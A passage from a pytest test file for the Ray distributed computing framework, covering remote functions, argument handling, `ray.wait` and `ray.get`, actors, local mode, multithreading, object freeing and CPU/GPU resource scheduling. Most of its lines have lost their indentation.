assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(ray_start_regular):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def test_no_args(ray_start_regular):
    @ray.remote
    def no_op():
        pass
    ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=2, num_gpus=1, resources={"Custom": 1})
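    # The private _remote() API allows per-call overrides such as
    # num_return_vals and resource requirements.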
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
assert ray.get(g._remote()) == []
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
@ray.remote
class Actor2(object):
def __init__(self):
pass
def method(self):
pass
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
a2 = Actor2._remote()
ray.get(a2.method._remote())
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_many_fractional_resources(shutdown_only):
ray.init(num_cpus=2, num_gpus=2, resources={"Custom": 2})
@ray.remote
def g():
return 1
@ray.remote
def f(block, accepted_resources):
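        # ray.get_resource_ids() maps each resource name to a list of
        # (resource_id, fraction) pairs assigned to this worker; compare the
        # fractions against what the caller requested.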
true_resources = {
resource: value[0][1]
for resource, value in ray.get_resource_ids().items()
}
if block:
ray.get(g.remote())
return true_resources == accepted_resources
# Check that the resource are assigned correctly.
result_ids = []
for rand1, rand2, rand3 in np.random.uniform(size=(100, 3)):
resource_set = {"CPU": int(rand1 * 10000) / 10000}
result_ids.append(f._remote([False, resource_set], num_cpus=rand1))
resource_set = {"CPU": 1, "GPU": int(rand1 * 10000) / 10000}
result_ids.append(f._remote([False, resource_set], num_gpus=rand1))
resource_set = {"CPU": 1, "Custom": int(rand1 * 10000) / 10000}
result_ids.append(
f._remote([False, resource_set], resources={"Custom": rand1}))
resource_set = {
"CPU": int(rand1 * 10000) / 10000,
"GPU": int(rand2 * 10000) / 10000,
"Custom": int(rand3 * 10000) / 10000
}
result_ids.append(
f._remote(
[False, resource_set],
num_cpus=rand1,
num_gpus=rand2,
resources={"Custom": rand3}))
result_ids.append(
f._remote(
[True, resource_set],
num_cpus=rand1,
num_gpus=rand2,
resources={"Custom": rand3}))
assert all(ray.get(result_ids))
# Check that the available resources at the end are the same as the
# beginning.
stop_time = time.time() + 10
correct_available_resources = False
while time.time() < stop_time:
if (ray.available_resources()["CPU"] == 2.0
and ray.available_resources()["GPU"] == 2.0
and ray.available_resources()["Custom"] == 2.0):
correct_available_resources = True
break
if not correct_available_resources:
assert False, "Did not get correct available resources."
def test_get_multiple(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(ray_start_regular):
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(ray_start_regular):
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(ray_start_regular):
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(ray_start_regular):
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(ray_start_2_cpus):
@ray.remote
def f():
with ray.profile("custom_event", extra_data={"name": "custom name"}):
pass
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
profile_data = ray.timeline()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
if time.time() - start_time > timeout_seconds:
raise RayTestTimeoutException(
"Timed out while waiting for information in "
"profile table. Missing events: {}.".format(
set(expected_types) - set(event_types)))
# The profiling information only flushes once every second.
time.sleep(1.1)
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(address=cluster.address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Make sure we have enough workers on the remote nodes to execute some
# tasks.
tasks = [f.remote() for _ in range(10)]
start = time.time()
ray.get(tasks)
end = time.time()
# Submit some more tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep((end - start) * 2)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(address=cluster.address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.object_transfer_timeline()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(ray_start_regular):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(ray_start_regular):
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(ray_start_2_cpus):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
    assert ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Wait 0.1 second for the objects to be deleted.
# 4. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(address=cluster.address)
class RawActor(object):
def get(self):
return ray.worker.global_worker.node.unique_id
ActorOnNode0 = ray.remote(resources={"Custom0": 1})(RawActor)
ActorOnNode1 = ray.remote(resources={"Custom1": 1})(RawActor)
ActorOnNode2 = ray.remote(resources={"Custom2": 1})(RawActor)
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def run_one_test(actors, local_only, delete_creating_tasks):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free(
[a, b, c],
local_only=local_only,
delete_creating_tasks=delete_creating_tasks)
# Wait for the objects to be deleted.
time.sleep(0.1)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
    # Case 1: run this with local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
    # Case 2: run this with local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.node.unique_id
for object_id in l1:
assert ray.get(object_id) != local_return
    # Case 3: These cases test deleting the creating tasks for the objects.
(a, b, c) = run_one_test(actors, False, False)
task_table = ray.tasks()
for obj in [a, b, c]:
assert ray._raylet.compute_task_id(obj).hex() in task_table
(a, b, c) = run_one_test(actors, False, True)
task_table = ray.tasks()
for obj in [a, b, c]:
assert ray._raylet.compute_task_id(obj).hex() not in task_table
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return ObjectIDs.
assert isinstance(xref, ray.ObjectID)
assert np.alltrue(ray.get(xref) == np.ones([3, 4, 5]))
y = np.random.normal(size=[11, 12])
# Check that ray.get(ray.put) is the identity.
assert np.alltrue(y == ray.get(ray.put(y)))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
bref = local_mode_g.remote(ray.get(aref))
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(ray.get(aref) == np.array([0, 0]))
assert np.alltrue(ray.get(bref) == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Check that ray.put() and ray.internal.free() work in local mode.
v1 = np.ones(10)
v2 = np.zeros(10)
k1 = ray.put(v1)
assert np.alltrue(v1 == ray.get(k1))
k2 = ray.put(v2)
assert np.alltrue(v2 == ray.get(k2))
ray.internal.free([k1, k2])
with pytest.raises(Exception):
ray.get(k1)
with pytest.raises(Exception):
ray.get(k2)
# Should fail silently.
ray.internal.free([k1, k2])
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
@ray.method(num_return_vals=3)
def returns_multiple(self):
return 1, 2, 3
test_actor = LocalModeTestClass.remote(np.arange(10))
obj = test_actor.get_array.remote()
assert isinstance(obj, ray.ObjectID)
assert np.alltrue(ray.get(obj) == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == ray.get(test_actor.get_array.remote()))
# Check that actor handles work in local mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
# Check that exceptions are deferred until ray.get().
exception_str = "test_basic remote task exception"
@ray.remote
def throws():
raise Exception(exception_str)
obj = throws.remote()
with pytest.raises(Exception, match=exception_str):
ray.get(obj)
# Check that multiple return values are handled properly.
@ray.remote(num_return_vals=3)
def returns_multiple():
return 1, 2, 3
obj1, obj2, obj3 = returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
obj1, obj2, obj3 = test_actor.returns_multiple.remote()
assert ray.get(obj1) == 1
assert ray.get(obj2) == 2
assert ray.get(obj3) == 3
assert ray.get([obj1, obj2, obj3]) == [1, 2, 3]
@ray.remote(num_return_vals=2)
def returns_multiple_throws():
raise Exception(exception_str)
obj1, obj2 = returns_multiple_throws.remote()
with pytest.raises(Exception, match=exception_str):
        ray.get(obj1)
with pytest.raises(Exception, match=exception_str):
ray.get(obj2)
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 2
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 2
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
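    # Each helper asserts that the worker sees exactly num_gpus_per_worker
    # GPU ids and that CUDA_VISIBLE_DEVICES matches them.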
def get_gpu_ids(num_gpus_per_worker):
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == num_gpus_per_worker
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
f0 = ray.remote(num_gpus=0)(lambda: get_gpu_ids(0))
f1 = ray.remote(num_gpus=1)(lambda: get_gpu_ids(1))
f2 = ray.remote(num_gpus=2)(lambda: get_gpu_ids(2))
f4 = ray.remote(num_gpus=4)(lambda: get_gpu_ids(4))
f5 = ray.remote(num_gpus=5)(lambda: get_gpu_ids(5))
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise RayTestTimeoutException(
"Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
